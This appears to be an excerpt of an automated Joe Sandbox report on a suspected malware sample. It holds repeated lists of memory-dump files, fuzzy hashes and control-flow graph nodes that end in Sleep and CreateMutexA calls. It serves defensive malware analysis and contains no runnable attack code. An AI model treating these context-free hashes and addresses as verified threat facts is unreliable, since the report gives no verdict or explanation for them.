                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: a28f793a255bca5977a082cfd3e00ef09fe67eeab6d0ea9a8f9c3a51c18f3b6a
                                                          • Instruction ID: d8c87ad0429b828f9c759c58a3faed81db41f76303709e192616bcc31d89c196
                                                          • Opcode Fuzzy Hash: a28f793a255bca5977a082cfd3e00ef09fe67eeab6d0ea9a8f9c3a51c18f3b6a
                                                          • Instruction Fuzzy Hash: F73146317641409BEB089B79DC8DFADB766AF86310F20861AE418973E1C7769DA08752

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 768 2da418-2da438 772 2da43a-2da446 768->772 773 2da466-2da482 768->773 774 2da45c-2da463 call 2ed663 772->774 775 2da448-2da456 772->775 776 2da484-2da490 773->776 777 2da4b0-2da4cf 773->777 774->773 775->774 782 2da93f-2da994 call 306c6a * 4 Sleep CreateMutexA 775->782 778 2da4a6-2da4ad call 2ed663 776->778 779 2da492-2da4a0 776->779 780 2da4fd-2da916 call 2e80c0 777->780 781 2da4d1-2da4dd 777->781 778->777 779->778 779->782 786 2da4df-2da4ed 781->786 787 2da4f3-2da4fa call 2ed663 781->787 804 2da9a7-2da9a8 782->804 805 2da996-2da998 782->805 786->782 786->787 787->780 805->804 806 2da99a-2da9a5 805->806 806->804
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: 22c165a054e11b7d8510fdfba291a24d3bda45c6f5431ad991ce8d0134ae0032
                                                          • Instruction ID: 2898ea5a93f26e2da98cc795eddc474fb2acd0bfa82fabadf08a8ee8e52d164f
                                                          • Opcode Fuzzy Hash: 22c165a054e11b7d8510fdfba291a24d3bda45c6f5431ad991ce8d0134ae0032
                                                          • Instruction Fuzzy Hash: B5316A317211408BEB08EB78D8DEFADB766DF85310F20821AE0189B3D5C7B54DA08662

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 808 2da54d-2da56d 812 2da56f-2da57b 808->812 813 2da59b-2da5b7 808->813 814 2da57d-2da58b 812->814 815 2da591-2da598 call 2ed663 812->815 816 2da5b9-2da5c5 813->816 817 2da5e5-2da604 813->817 814->815 822 2da944-2da994 call 306c6a * 3 Sleep CreateMutexA 814->822 815->813 818 2da5db-2da5e2 call 2ed663 816->818 819 2da5c7-2da5d5 816->819 820 2da606-2da612 817->820 821 2da632-2da916 call 2e80c0 817->821 818->817 819->818 819->822 826 2da628-2da62f call 2ed663 820->826 827 2da614-2da622 820->827 842 2da9a7-2da9a8 822->842 843 2da996-2da998 822->843 826->821 827->822 827->826 843->842 844 2da99a-2da9a5 843->844 844->842
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: 264750d5d0d800701ad8e3bba00fdd8206429605f1a9eb870520a989c6637cae
                                                          • Instruction ID: abe071fffb317fd191d5df4f0500b821dd831d09745d89ae27fe52e53975573a
                                                          • Opcode Fuzzy Hash: 264750d5d0d800701ad8e3bba00fdd8206429605f1a9eb870520a989c6637cae
                                                          • Instruction Fuzzy Hash: DB314A31B251408BEB08DB78ECD9FADB766EF85314F24861AE014DB3D5C7758DA08752

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 846 2da682-2da6a2 850 2da6a4-2da6b0 846->850 851 2da6d0-2da6ec 846->851 852 2da6c6-2da6cd call 2ed663 850->852 853 2da6b2-2da6c0 850->853 854 2da6ee-2da6fa 851->854 855 2da71a-2da739 851->855 852->851 853->852 856 2da949-2da994 call 306c6a * 2 Sleep CreateMutexA 853->856 858 2da6fc-2da70a 854->858 859 2da710-2da717 call 2ed663 854->859 860 2da73b-2da747 855->860 861 2da767-2da916 call 2e80c0 855->861 878 2da9a7-2da9a8 856->878 879 2da996-2da998 856->879 858->856 858->859 859->855 862 2da75d-2da764 call 2ed663 860->862 863 2da749-2da757 860->863 862->861 863->856 863->862 879->878 880 2da99a-2da9a5 879->880 880->878
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID: T23
                                                          • API String ID: 1464230837-3327420953
                                                          • Opcode ID: 6d9ff38a59f32e729a13a49b6e0b3126ec9c8026725676f2161ae4d4448bba7d
                                                          • Instruction ID: b5d165345c959cf651bb53fd7416fbfe83d3b241e2e63e584bb48603d9a5d1a1
                                                          • Opcode Fuzzy Hash: 6d9ff38a59f32e729a13a49b6e0b3126ec9c8026725676f2161ae4d4448bba7d
                                                          • Instruction Fuzzy Hash: E03128317642409BEB08DB78DC99FADF766EF85310F24861AE018DB3E5C7758DA08762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 882 2d9adc-2d9ae8 883 2d9afe-2d9d91 call 2ed663 call 2e7a00 call 2d5c10 call 2d8b30 call 2e8220 call 2e7a00 call 2d5c10 call 2d8b30 call 2e8220 882->883 884 2d9aea-2d9af8 882->884 884->883 885 2da917 884->885 887 2da953-2da994 Sleep CreateMutexA 885->887 888 2da917 call 306c6a 885->888 894 2da9a7-2da9a8 887->894 895 2da996-2da998 887->895 888->887 895->894 897 2da99a-2da9a5 895->897 897->894
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 002DA963
                                                          • CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                          • Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
